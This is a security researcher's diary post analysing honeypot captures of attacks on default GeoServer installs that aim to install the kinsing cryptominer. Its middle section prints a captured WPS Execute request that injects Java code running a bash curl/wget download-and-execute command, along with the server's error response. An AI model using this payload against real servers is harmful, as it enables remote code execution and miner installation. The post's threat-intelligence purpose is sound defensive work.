Geoserver Attack Details: More Cryptominers against Unconfigured WebApps

Published: 2023-06-12
Last Updated: 2023-06-12 12:46:13 UTC
by Johannes Ullrich (Version: 1)
4 comment(s)

code snippet from exploit request showing code that downloads via curl.Last week, I noted increased scans against "GeoServer" [1]. GeoServer is an open-source Java application with a simple web-based interface to share geospatial data like maps [2]. 

graph showing an increase in scans against geoserver

I followed our usual playbook of redirecting these scans to an instance of GeoServer. Geoserver had a few vulnerabilities in the past. I installed an older version of GeoServer to verify if the vulnerability was exploited.  However, it looks like a vulnerability wasn't necessary. Instead, similar to what we have seen with NiFi recently, the attacker is just using a built-in code execution feature, and the default install, as deployed by me, did not require credentials.

GeoServer was installed in a docker container, which prevented any actual execution of the attack code. The container did not provide tools like curl to download additional payload. Instead, I downloaded the payloads later manually.

Soon after I configured the honeypot, several exploit requests arrived from These requests took advantage of the Web Processing Server (WPS). I highlighted some of the relevant features in the request below:

POST /geoserver/wms HTTP/1.1
Host: [honeypot ip address]:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 2261
Content-Type: application/xml
Accept-Encoding: gzip


<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="" xmlns="" xmlns:wfs="" xmlns:wps="" xmlns:ows="" xmlns:gml="" xmlns:ogc="" xmlns:wcs="" xmlns:xlink="" xsi:schemaLocation="">
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { reader = new String[]{"/bin/bash","-c","(curl -s||wget -q -O-|bash"}).getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch ( e) {} }} /**</wps:LiteralData>
<wps:RawDataOutput mimeType="image/tiff">

The request uses the "Execute" operation, which can be used to "perform the process with specified input values and required output data items" [3]. The "bash" request is pretty simple; it uses curl to retrieve and execute additional code. 

Due to the restrictions of the docker install of GeoServer, the execution failed, and the following response was returned:

<?xml version="1.0" encoding="UTF-8"?>
<wps:ExecuteResponse xmlns:xs="" xmlns:ows="" xmlns:wps="" xmlns:xlink="" xml:lang="en" service="WPS" serviceInstance="http://[honeypot ip address]:8080/geoserver/ows?" version="1.0.0">
<wps:Process wps:processVersion="1.0.0">
<ows:Title>Jiffle map algebra</ows:Title>
<ows:Abstract>Map algebra powered by Jiffle</ows:Abstract></wps:Process>
<wps:Status creationTime="2023-06-09T04:18:57.977Z"><wps:ProcessFailed><ows:ExceptionReport version="1.1.0"><ows:Exception exceptionCode="NoApplicableCode"><ows:ExceptionText>

Process failed during execution
java.lang.ExceptionInInitializerError - found curl/etc/kinsingwget is curl -not found /dev/etc/kinsing not exists/etc/kinsing after download exists and checked/etc/ not exists/etc/ after download not exists/etc/ after download2 not exists
Running as root

Looking at "" reveals a script almost identical to the "" script I wrote about concerning the attacks against NiFi. Both scripts use the same host ( to retrieve the or the script. Taking a look at other scans from related IPs, it looks like they are also attempting to exploit a Confluence/Nashorn issue [4].

The goal for all of these attacks appears to be to install the "kinsing" crypto miner.


Johannes B. Ullrich, Ph.D. , Dean of Research,

4 comment(s)
ISC Stormcast For Monday, June 12th, 2023


Diary Archives